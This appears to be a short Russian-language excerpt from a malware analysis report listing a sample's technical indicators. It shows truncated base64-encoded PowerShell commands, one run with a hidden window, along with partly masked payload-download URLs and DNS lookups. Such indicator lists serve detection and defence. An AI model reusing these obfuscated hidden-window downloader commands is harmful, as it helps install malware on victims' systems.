Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAHEAOQBxADkAbQBvAD0AKAAnAFoANwAyAHkAYgA4ACcAKwAnAHIAJwApADsAJgAoACcAbgBlACcAKwAnAHcALQBpAHQAZQBtACcAKQAgACQAZQBuAHYAOgB0AEUATQBQAFwATwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...
- http://www.ma###vacca.com/img_albums/nzb/
- http://mi###pub.net/azure/o3J/
- http://1k#####kralovstvi.cz/wp-includes/3z/
- DNS ASK mi###mex.com
- DNS ASK ma###vacca.com
- DNS ASK me###nian.net
- DNS ASK mi###pub.net
- DNS ASK 1k#####kralovstvi.cz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAHEAOQBxADkAbQBvAD0AKAAnAFoANwAyAHkAYgA4ACcAKwAnAHIAJwApADsAJgAoACcAbgBlACcAKwAnAHcALQBpAHQAZQBtACcAKQAgACQAZQBuAHYAOgB0AEUATQBQAFwATwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...' (со скрытым окном)